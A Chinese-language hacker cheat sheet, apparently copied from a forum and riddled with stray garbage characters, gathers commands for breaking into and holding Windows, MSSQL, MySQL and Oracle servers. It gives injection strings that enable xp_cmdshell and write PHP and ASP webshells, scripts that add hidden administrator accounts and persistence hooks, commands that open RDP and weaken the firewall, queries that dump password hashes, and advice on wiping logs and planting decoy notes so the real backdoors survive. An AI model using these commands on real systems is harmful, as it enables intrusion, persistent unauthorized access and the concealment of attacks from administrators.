5 p* ` {/ b8 m: I1.net user administrator /passwordreq:no3 J$ Z2 K, s7 }1 k+ c
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了2 V+ E5 p( i% Q2 I5 k
2.比较巧妙的建克隆号的步骤+ L" H5 m; h$ D% J1 p7 } P
先建一个user的用户
0 u; {1 X3 L: g" P: V }然后导出注册表。然后在计算机管理里删掉! Y. F8 Q4 N3 M
在导入,在添加为管理员组* j* v/ {3 E& N; c
3.查radmin密码. ?% v; v' Z# G+ @! o
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg3 _4 q% ?. `8 _7 f) C$ H4 H* o0 [( e
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 l0 S# t0 o4 Z. ?, V建立一个"services.exe"的项* y* d! v9 V7 O% w- K
再在其下面建立(字符串值), w! b0 E3 J! {$ g- n5 f2 `
键值为mu ma的全路径
5 u0 x8 M8 t z; X5.runas /user:guest cmd
5 }2 C1 U) N* i3 a测试用户权限!4 ] B* x9 ~1 @/ D6 j
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
# m; J* N/ Y( ? ^) s7.入侵后漏洞修补、痕迹清理,后门置放:) T- C& t% j9 z5 \6 Z
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门5 |! b8 ]$ V/ O( O0 [) ]
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
+ s" r3 O7 s |* @2 x" j
) }* K, O8 H2 {7 zfor example6 u" |" U$ n5 ^
0 v' n1 ~4 m, F1 I# i) Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'" Q( ^) p& V4 y7 ]* a
. }3 ]4 ? {( L! {" \+ _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
7 L8 C/ l) ~9 D8 }+ H& Z
T; A a" k6 W# J3 T% K9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
& x% G ?3 {1 y! j+ s2 I m, C如果要启用的话就必须把他加到高级用户模式
7 K" h8 `2 a9 [7 d% o$ K q可以直接在注入点那里直接注入" I; q: E: K0 }( }* l; C
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
+ U, m7 E7 X( ~1 a2 B- B7 h然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--/ n! q- X9 V/ h5 Q
或者
. D) l5 O/ l3 G. f; L4 W0 r8 Ssp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'* N) T* `0 T* B _
来恢复cmdshell。
1 p+ c* i2 s2 v( `% r& F* t. z7 E T" [% J) b1 ~* d( X) `3 K
分析器2 S$ x3 [; v0 L& [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
) e# W# s8 x% ?然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")# f0 W. e; m7 ]/ N2 i4 E! K
10.xp_cmdshell新的恢复办法) Y/ d; X2 _& v) U; T4 m
xp_cmdshell新的恢复办法
7 O& m, V( I9 P扩展储存过程被删除以后可以有很简单的办法恢复:' J- t+ ~, E) H! g
删除
1 L! \$ ?: d& d* h( ?: Edrop procedure sp_addextendedproc1 Z; c- H8 }" {+ _0 l
drop procedure sp_oacreate/ N" t: U# X' _- I/ [
exec sp_dropextendedproc 'xp_cmdshell'
' c0 b4 y& ^7 G! l1 D0 b0 S' k" R# D
9 H9 @! ^& o) B. q- n) O/ K# ^2 f恢复
, X$ W: F, q! | F8 D' Idbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 U' v! q: C: \6 L) Udbcc addextendedproc ("xp_cmdshell","xplog70.dll")& ^; A; n* y4 w8 b5 i% z; o
$ {7 t1 D) o Y! i: g0 r2 k这样可以直接恢复,不用去管sp_addextendedproc是不是存在* V5 E3 \0 x0 O# g8 F9 a( A
5 E, {; q9 K4 ^; J4 Y( ]% u& \0 a-----------------------------5 h8 x2 k1 o5 {( N/ Y3 K# t0 z
* d+ Q: n2 ]1 c# }- \删除扩展存储过过程xp_cmdshell的语句:9 G4 o4 C$ X7 H' A# E
exec sp_dropextendedproc 'xp_cmdshell'
1 Q0 P3 h' O+ j0 Q; a9 h$ f: s2 K
恢复cmdshell的sql语句. v( E% J) V: r4 G! F. f K
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
9 w' A; M/ d2 \+ d. @4 Q4 @* i, x; K; |$ A& }
& V; W: U3 i' g9 m; G! t# T# ~* \3 o开启cmdshell的sql语句
3 t4 C. h5 Y% J) b! \9 V. @0 Q5 W. w1 T6 w/ h* o" f% \
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'% ~& Y6 |" z& m
( _9 ^% R: k8 m: r+ d+ a! [
判断存储扩展是否存在5 h4 n$ v; Z0 C- a
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# `+ N3 X0 X4 Z. D+ @ K1 z
返回结果为1就ok/ ~( ]; z# a: N5 [: t
9 Z0 E( \7 ?4 z7 W1 G恢复xp_cmdshell
6 T! r0 a2 L- A) Pexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
0 `- T, j2 n/ s1 w# i w( k返回结果为1就ok
2 O; E$ z( G" Y7 O
" i! y4 w3 d8 A4 L否则上传xplog7.0.dll
- U# w$ c* a' }5 @+ F- ~exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'$ _3 h ]* d$ i7 B8 n
" T) R4 U1 |" @9 X0 f/ u0 i- ~堵上cmdshell的sql语句; P9 i6 B, e: X. j: C( l! s2 _
sp_dropextendedproc "xp_cmdshel
3 z; p8 {3 I( E4 z- l6 ?9 p-------------------------
2 m5 r3 D6 K( h5 Q) O1 T' [9 M清除3389的登录记录用一条系统自带的命令:' R" o5 R2 g( X6 M+ O5 }. h- a
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f$ J0 V1 x8 {4 Q: P0 ]9 A" o9 U, ?
9 g6 r, ?5 B' V- Y6 U0 J
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件) y' G( G; t) P- U0 |0 h0 B& x* B
在 mysql里查看当前用户的权限% W# ~ q8 g) f- o C
show grants for
) K0 E, n' [6 W6 |
" {0 p( {7 ~& `% I以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
6 r( Y6 L- [/ f3 W: V% V* u7 V4 g+ G/ @+ h
d! j4 J z" M' u& t4 i/ B7 b* r1 B
Create USER 'itpro'@'%' IDENTIFIED BY '123';
. s* o, A5 o$ L2 A& W/ c5 ^3 l4 D M* k5 }9 X! X, }3 k; T
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION4 i4 I4 P2 d* X7 F
O: q1 y, k/ r. x2 ^, C6 jMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
% y* j; n+ m1 H) t
/ t1 Z( r% N/ P% N% oMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. H X+ H& ?3 S* w6 r2 n$ O' o9 k4 ]/ `+ ]6 l
搞完事记得删除脚印哟。' H! t5 r! I0 J M: u: v/ t: M
8 B* W- \/ |+ o' G% \
Drop USER 'itpro'@'%';" z/ k+ b8 p$ c: a; {
2 `8 [" _0 D+ ~Drop DATABASE IF EXISTS `itpro` ;
# @- _+ K& S3 I% b, L4 L: v m. ?& _' u0 F, T) W/ q$ G
当前用户获取system权限. S1 J8 M. a$ b! W: _" o6 _* W: x9 O; `
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact8 i. Z: R5 ]& ]) F( G- F
sc start SuperCMD
" g! [% o/ R0 e- @" I! T6 q程序代码
' `7 e# T/ L, t<SCRIPT LANGUAGE="VBScript">
! S/ A# N9 w; tset wsnetwork=CreateObject("WSCRIPT.NETWORK")8 r$ U; z* U8 l- I
os="WinNT://"&wsnetwork.ComputerName
7 e9 b) ?9 H2 c; N" W3 y X% WSet ob=GetObject(os)
1 W, G" l# H' kSet oe=GetObject(os&"/Administrators,group")1 t0 Q) D- a3 a
Set od=ob.Create("user","nosec")
: `9 K3 B' f0 i M! _+ w6 |0 Tod.SetPassword "123456abc!@#") P8 e! M' [5 ]
od.SetInfo2 S/ n8 U5 w" U9 I; L
Set of=GetObject(os&"/nosec",user)* d; H- R- b+ W5 O
oe.add os&"/nosec"
: V% K3 ]* M: w3 P. j9 g</Script>0 |% G8 N9 s% k/ b1 o
<script language=javascript>window.close();</script>
3 }, o; T& G5 e5 V0 s$ `+ i" V( b$ E
5 K/ d8 L" P8 v; W7 E: f' J/ `4 ?) q2 x: d
& b; z/ s( g0 x# r5 G$ t: y9 a4 ~; q0 S' R3 i1 t* z
突破验证码限制入后台拿shell
* S [$ A y/ i* r U" T% K程序代码$ a- G1 m! J- t4 p) S
REGEDIT4 ' g4 }# @7 S$ h( d( g/ l% k5 J
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
" P2 `. v6 t* g' B, y3 q"BlockXBM"=dword:00000000$ L+ Y6 [ Y5 @, W @
" ~ J- k$ Q9 l* ~7 {# b$ v
保存为code.reg,导入注册表,重器IE# a) W( ]) U" _* a* ]1 N3 @
就可以了
, p/ c" Z! T4 W3 s/ t6 Eunion写马2 d' i( e. v2 g8 f1 D: J
程序代码/ s' P8 e3 C, n# K! {% i( V* ~4 o
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*5 F0 {# |+ `" t' V9 Q
, F1 G7 h+ \4 t/ m
应用在dedecms注射漏洞上,无后台写马
$ Z8 d) d7 a8 udedecms后台,无文件管理器,没有outfile权限的时候
2 c+ D8 Q8 r5 n; e在插件管理-病毒扫描里
' a9 n* ^. L" n3 ^' e. R9 O) A+ |写一句话进include/config_hand.php里
( }! C( w2 U6 e4 v; h+ y* |程序代码, E- [3 J5 W0 i9 `' s# t0 ~1 U7 [2 z
>';?><?php @eval($_POST[cmd]);?>
& P! m6 @7 i" p5 c
. Z" F* i* _" z# U
- s2 T! S3 n* [9 y如上格式
# `; L8 u9 N1 R/ ~ ~7 v" r" ?9 ?; B7 g* m+ P2 H" M: Q3 @
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解- W( X$ ^, {* ]/ J
程序代码1 y# a! u3 u+ a$ H) @6 E. P3 I( k) Q
select username,password from dba_users;" d- q# }) c& ? Q, C6 O( K- z# a0 z
' R- [. k1 M+ Q; F8 s8 ^ b! Z
- m$ a/ G2 P- g* h' v, e+ X% m
mysql远程连接用户( ]' p) B$ _3 l
程序代码
) t, h1 [, G8 l! ] N; e" Q/ ]! p
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';4 F" R q" \( x4 @/ @& U
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
- k9 i0 B) o0 f$ S& O! e! @MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0: B3 V/ c9 v g. X
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
% J U8 G2 X3 S/ X
4 W4 s+ s. Y+ i! K1 F" N
# R' y; |7 ]; O/ v7 b, V! S) H7 z, J7 Y E6 p
t; x; o% w. g' h* K; ^echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
" ?( K, `2 b8 A) E5 {7 w+ Y$ S, b- T
1.查询终端端口4 a* S+ ^3 d7 n& I# K& U3 L
- u/ A/ h% ^% C |3 Jxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
9 _; z( \0 r2 K7 U7 K* y5 R- r" g/ F7 _
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
; s# \8 I6 @. p! a8 Otype tsp.reg
* z8 y. U, w8 m& ]6 ?" q( }
4 m6 i4 s7 v1 q; P% ^; Y2.开启XP&2003终端服务& m( n/ c/ Q$ ^) A8 c- W
& Q& P- n& g2 U, Q7 a# O( ^7 Y6 }( A6 J3 e; k7 L
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f) u4 ~/ z7 {+ x. U+ o5 X
; [/ I& Q& u) \; m6 O* y- H+ w1 `' z
( K7 a/ v$ ]% z. F6 {/ d1 E
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f! `; [0 L; e5 s) m+ b- g
) r7 \* @' [/ g5 e* `
3.更改终端端口为20008(0x4E28)
) G F9 x; c9 n" H% X2 ^7 I$ H, g' @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f. x0 x F) m# ?- |0 `6 ^) M
+ _' C5 j2 @3 Y' C4 X# L, ?
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' i5 l3 ~ x, q; h! H9 O& e; W G9 _0 a' Z9 @9 U- c2 Y
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制1 g! m0 E. v1 y
1 Z$ s O o5 AREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f0 {. K- Y4 ?$ u/ g: K4 _
_+ |( e" m( l# ^$ d( g K a- D
5 r" l" J! d; D
5.开启Win2000的终端,端口为3389(需重启)
, f2 E' V6 k7 s/ ^) \! W; G( Y3 @. ]9 C! t8 M
echo Windows Registry Editor Version 5.00 >2000.reg 1 ^( y5 r% f; R0 i$ V! q
echo. >>2000.reg' a; g' M- x- q' L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
- W0 c" @; Z: N* y: Techo "Enabled"="0" >>2000.reg
d B, x6 E1 m1 w1 R1 Cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ' z+ |# A- i& E. g/ \4 C, f
echo "ShutdownWithoutLogon"="0" >>2000.reg ; Z- C7 z5 \$ G% S1 y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
L$ n- r' \4 R; E+ E- Z! {; [7 Gecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
7 m O+ w) Y" q$ k X6 I4 Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 1 X* }/ C& s$ g5 c
echo "TSEnabled"=dword:00000001 >>2000.reg
1 J% f- O) v, B. ^) C3 A& F0 vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
+ e1 ~# Y5 v) Pecho "Start"=dword:00000002 >>2000.reg : P. s' |( T: }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg . z% H/ v* D2 L" [$ _
echo "Start"=dword:00000002 >>2000.reg
: V" v" N* o& {) V' Decho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
$ ?7 K) ]7 K1 A1 m1 a% Necho "Hotkey"="1" >>2000.reg ( q% ]. D! |( _, w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
, v; i1 U; ~' Q" Kecho "ortNumber"=dword:00000D3D >>2000.reg 3 t F2 [: b+ P' c, t) L, h5 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
( |9 F3 P9 g5 ]$ ^6 e- l6 ^echo "ortNumber"=dword:00000D3D >>2000.reg
6 X* d5 P o7 K: G5 A! o0 b2 ~5 z9 F
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% h4 \/ `4 x2 T) g2 p& j, x+ |: G" U, M
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
1 S o* @5 I6 Y7 l0 q(set inf=InstallHinfSection DefaultInstall)
; _! \4 Y' @$ C9 z3 Y2 E1 Yecho signature=$chicago$ >> restart.inf; R* E) e# e- a( r
echo [defaultinstall] >> restart.inf: B g8 o9 J6 I0 k: \+ z% j, q) U
rundll32 setupapi,%inf% 1 %temp%\restart.inf
' C! I9 S9 d" g% Z5 a- f( N
' g8 W& A% b' n- P6 P% N# l( B. T
7.禁用TCP/IP端口筛选 (需重启)* x, T0 C3 N4 L- }" H4 L, [
5 i, n9 @* M' q$ x. ^& n" RREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f8 s' A: T8 v; f; U' B" }8 L
5 K; x7 j/ S0 K8.终端超出最大连接数时可用下面的命令来连接9 E! p. y% `0 O$ v' x: o
- P5 J* X, j5 N0 F' B
mstsc /v:ip:3389 /console6 ]# s! J. q8 V4 O3 G( j8 }) Q
& i3 f$ U- C% r7 R( `" F% \6 b3 |9.调整NTFS分区权限7 [$ \, A, M" f. @: ^! m& s. `4 c4 z
; {# h& O, i8 a" h4 v) X5 t/ ~
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
; B% T1 Q3 d1 e2 X7 a# I2 T' t, Z
3 k$ ?+ `( b. R/ h3 ncacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)2 u/ j: l$ O9 A6 R
4 v$ _$ u9 P) l. f. y
------------------------------------------------------
5 \1 u, X B v! b1 ~: i- ^2 D9 U3389.vbs
# ]0 G) ?/ u5 oOn Error Resume Next
5 z" v N! ]; }+ Q) N' d9 l& r- |const HKEY_LOCAL_MACHINE = &H80000002
; L' g" n( r' D4 dstrComputer = "."
8 V4 M2 G- c6 Q: gSet StdOut = WScript.StdOut4 u1 E" {+ N7 X. S$ s
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_0 ~7 t& p; ]" G* ]$ |* J/ p
strComputer & "\root\default:StdRegProv"): S' B B+ o7 G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"! L- `6 R/ p* j6 T; J
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( f; c% t2 Y# O. ?, N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 _* P' p# \7 Z$ E9 Foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath8 f; d/ o7 j. d6 T! A# H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
. K9 ]+ o# s* A# s" Y; TstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"; V% g1 d3 A2 j5 f, N
strValueName = "fDenyTSConnections"5 ?: v4 U0 ~$ ^1 x( ~
dwValue = 0
: j% m3 v6 f3 B" Z$ Roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, ?* H+ I! j1 AstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
; w* p' g* G) I' R+ IstrValueName = "ortNumber"
) Z. G3 ~! ]5 |& ]dwValue = 3389
3 Z+ S4 O0 o9 koreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
% t6 R3 F# x% x$ A4 y$ t: ?- QstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" C$ n h R5 c* q, kstrValueName = "ortNumber"2 i3 z. V1 {: I6 I* n" |
dwValue = 33893 \/ z, |0 |$ M, e6 U* C1 R5 m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
9 B4 S, a: \5 b+ r9 Y9 lSet R = CreateObject("WScript.Shell")
& ?; A0 G( p! @# q0 YR.run("Shutdown.exe -f -r -t 0") . l, q( ~9 f5 b$ X, w3 w
7 n+ S" @$ M1 g) y删除awgina.dll的注册表键值
% v. O; s& ^& V% T程序代码
( ?) s# B* S( s9 h# ?! E3 o6 U9 u" v c
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f u* L" r: m, w$ }/ Q' o2 m
( }' i T5 G1 k: U7 w2 m1 B, k) ?! @3 F0 e# M
! e( |: t% e6 K. W8 B
: E2 x! Z A1 w l
程序代码
/ a5 P. ]/ y, a& h* k: lHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash( ]/ w# x+ m6 T% v. q
& {' E ^$ g$ z% g$ n
设置为1,关闭LM Hash
9 g3 r# B' J% B _0 g9 T9 x/ ?7 V9 E2 [' u: D4 ]
数据库安全:入侵Oracle数据库常用操作命令
/ \. S# d* m! {7 @6 l最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。: T# p5 ~( o: o9 z1 f) Q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
% E% }" M+ \* R* i* A2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;$ G4 y- Y' u" r
3、SQL>connect / as sysdba ;(as sysoper)或
( C ?% F. m2 |" b2 c0 ^connect internal/oracle AS SYSDBA ;(scott/tiger)8 t& s9 B5 Z) R$ d, I
conn sys/change_on_install as sysdba;* c0 L0 k6 z! v$ l3 Q
4、SQL>startup; 启动数据库实例: @# y% k; U: b& W% o8 ?# j
5、查看当前的所有数据库: select * from v$database; S: a2 J$ J" u' I3 B8 ]& n7 S
select name from v$database;
" _' }- @( @& Z3 W9 i6 M# g6、desc v$databases; 查看数据库结构字段0 _8 K( E7 Q: W* \$ b
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
3 }7 [2 Y% _, h; t! sSQL>select * from V_$PWFILE_USERS;$ }5 G- W8 m& r
Show user;查看当前数据库连接用户
- o/ T/ O& f- ]8、进入test数据库:database test;3 Y: X# l/ @$ M! D( k# @" [$ [+ ]
9、查看所有的数据库实例:select * from v$instance;
3 t* C% V& v# K5 I. l i q- E如:ora9i
$ I. [" }: q7 J* l, z- w10、查看当前库的所有数据表:
% p) I* J' t: k. F+ b$ ?- SSQL> select TABLE_NAME from all_tables;# U$ w2 \: d* t, c a2 S
select * from all_tables;! ?9 C8 i- U: z
SQL> select table_name from all_tables where table_name like '%u%';
: i& x" Z, f; h" L- ?8 u. FTABLE_NAME
2 N i* a. `0 L) ~------------------------------+ {! i6 n) u0 t
_default_auditing_options_
, R5 d/ {; F" d* D) X) f0 {6 {11、查看表结构:desc all_tables;
5 w. Q t j$ o( g. O12、显示CQI.T_BBS_XUSER的所有字段结构:0 \4 J8 _5 j& e! X5 i+ M; y, K% C
desc CQI.T_BBS_XUSER;
. A! l7 }+ g3 h4 n) t/ t1 h, r13、获得CQI.T_BBS_XUSER表中的记录:# Z( J* B# M. Z; F
select * from CQI.T_BBS_XUSER;
: j% v' L0 r, E& k14、增加数据库用户:(test11/test)" S; Y2 u5 Y4 { y9 L8 @. m
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;4 K! b: m& H3 X
15、用户授权:
2 X8 q( ?$ z% }$ J' M4 N1 bgrant connect,resource,dba to test11;
6 I; B- z7 R0 Tgrant sysdba to test11;" h" l. p+ Y- A* ^! k
commit;9 M5 g" T4 P, \! ^2 V& @3 s6 O
16、更改数据库用户的密码:(将sys与system的密码改为test.)1 ~6 Z7 `/ e+ s J. T" q7 v, v) O1 C
alter user sys indentified by test;( a2 ^3 B% P, A0 l
alter user system indentified by test;
! ?; M- U- p; s' v4 {; s( ]5 K' \
- t4 d, i: T( H! e' w, \! YapplicationContext-util.xml0 M. h) F N) ^0 H4 e# U% n* p
applicationContext.xml) T; m; p {9 m9 i* A! b; }
struts-config.xml
) }9 o& l9 @& R& ^. Jweb.xml* o: _1 @$ j/ Q" L7 C; a4 V
server.xml
! v8 D7 e9 u. V7 E3 Y5 utomcat-users.xml
- l+ z0 |6 E J- r0 v1 g; ^' e8 {hibernate.cfg.xml2 x% h9 T( h w6 f B
database_pool_config.xml8 }/ m: X8 j( F- D7 O
8 c6 B: J5 `4 J! Z( M6 |& s
9 W% L. A) o7 z) D" X- m\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
$ M3 C3 d$ p9 O; V+ W( w5 ~\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini$ j) V2 B( O ~0 f& L2 S2 P
\WEB-INF\struts-config.xml 文件目录结构
; a- T, X; ^3 D7 L; N1 [7 \: H T b7 S" J3 L# d. c" n. w e/ T
spring.properties 里边包含hibernate.cfg.xml的名称
. d( E0 v2 U* t3 y' I: T# g, J5 @6 F* m2 }9 E) Q1 }( |' c! \
. v6 w: v" k# e4 _$ a
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml1 W: X }/ a: Y. a! H4 t' D
2 J9 P. p# w. l; a7 [如果都找不到 那就看看class文件吧。。$ |1 Q1 e6 B. v& H) I) G: v
9 o( S( H8 D$ p, s6 s测试1:3 W- M! O4 ^: L4 o# D; D& ~1 k
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
5 ^% W0 d8 B0 N! C+ K# v4 V" f+ O
5 b K1 S' Z% p& i& i( v测试2:# j2 c4 l x) c
2 [& T+ v' U! j! @/ |create table dirs(paths varchar(100),paths1 varchar(100), id int)6 D Y, F, w6 K! A: j
; b! ^# u/ `1 m' V7 g) ] V9 L
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--/ g7 C ^( t1 ?1 ?7 m
. R6 e" m n TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; B5 @% v9 |/ ~' X
5 N- d7 Z. Q0 f& d7 s: ]5 K! O查看虚拟机中的共享文件:# `3 n0 @& Z& l* W
在虚拟机中的cmd中执行6 W; H" ~( I/ y$ _1 p1 v
\\.host\Shared Folders7 _+ V" e* e" A. k
0 v. u2 d4 E, f/ v, ]; r" _cmdshell下找终端的技巧
) `* C) ?' j5 r/ n+ [4 e找终端:
& Y) D) Z8 z" m8 p5 |6 Z! l第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
8 l" N. x/ |! ^$ C! N 而终端所对应的服务名为:TermService
7 n% s; [; h. A, P7 m第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 ~9 p0 y, N( {$ D
找到PID值所对应的端口2 K; n K0 W9 Z; ~+ U8 f/ b4 n7 S
& U E+ C/ T: W, N7 V查询sql server 2005中的密码hash+ u, T( S( @2 n7 O
SELECT password_hash FROM sys.sql_logins where name='sa'! M2 S* h3 ?$ K5 P# [
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) E. i* }& n: p; T0 ^4 Vaccess中导出shell
% f" f2 g9 I7 J6 B* x" `
/ ]4 Y5 C# j" L% A% n, o* D中文版本操作系统中针对mysql添加用户完整代码:# J; }# q+ E0 N- u, W7 k+ b
1 k. u# z# P7 J- b+ ^8 wuse test;
8 L( I3 w) X! icreate table a (cmd text);) X8 [% a+ U& B5 I/ _
